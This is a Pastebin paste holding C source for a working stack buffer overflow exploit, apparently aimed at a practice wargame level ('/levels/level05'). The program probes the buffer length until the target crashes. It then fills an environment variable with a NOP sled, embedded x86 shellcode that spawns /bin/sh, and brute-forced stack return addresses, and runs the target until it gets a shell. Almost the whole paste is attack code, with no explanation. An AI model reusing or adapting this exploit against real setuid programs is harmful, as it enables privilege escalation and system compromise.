Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
- #define NOP 0x90
- const int targetsz = 128;
- const int shcsz = 3*8+1;
- const char shellcode[] =
- "\x31\xc0\x50\x68\x6e\x2f\x73\x68"
- "\x68\x2f\x2f\x62\x69\x89\xe3\x50"
- "\x89\xe2\x53\x89\xe1\xb0\x0b\xcd"
- "\x80";
- unsigned long get_sp(void) {
- __asm__("movl %esp,%eax");
- }
- int main(int argc, char **argv) {
- unsigned long int sp = get_sp();
- int az;
- char *ab;
- int rc;
- for (az=targetsz; az<512 ;++az) {
- ab = calloc(az, sizeof(char));
- if (ab == NULL) { fprintf(stderr, "!!!\n"); return -1; }
- memset(ab, 'A', az);
- ab[az-1] = '\0';
- setenv("QQQ", ab, 1);
- rc = system("/levels/level05 $QQQ");
- free(ab);
- if (rc == 139) {
- printf("buffer size: %d, return code: %d\n", az, rc);
- break;
- }
- }
- az = ((az+3) & ~3) + 1;
- printf("buffer size: rounded to %d\n", az);
- ab = calloc(az, sizeof(char));
- unsigned long int *lab = (unsigned long int*)ab;
- int laz = az / sizeof(unsigned long int);
- // fill with nops
- memset(ab, NOP, az-1);
- // and then the shell code
- memcpy(ab+targetsz-shcsz, shellcode, shcsz);
- for (int offset=0; offset<1024; offset+=16) {
- for (int i=targetsz/sizeof(unsigned long int); i<laz; ++i) {
- lab[i] = sp-offset;
- }
- // lastly a null
- ab[az-1] = '\0';
- setenv("QQQ", ab, 1);
- printf("offset: %d, address:%lx\n", offset, lab[laz-1]);
- //rc = system("gdb /levels/level05 -ex \"set arg '$QQQ'\"");
- rc = system("/levels/level05 \"$QQQ\"");
- printf("rc: %d\n", rc);
- if (rc == 0) {
- return 0;
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement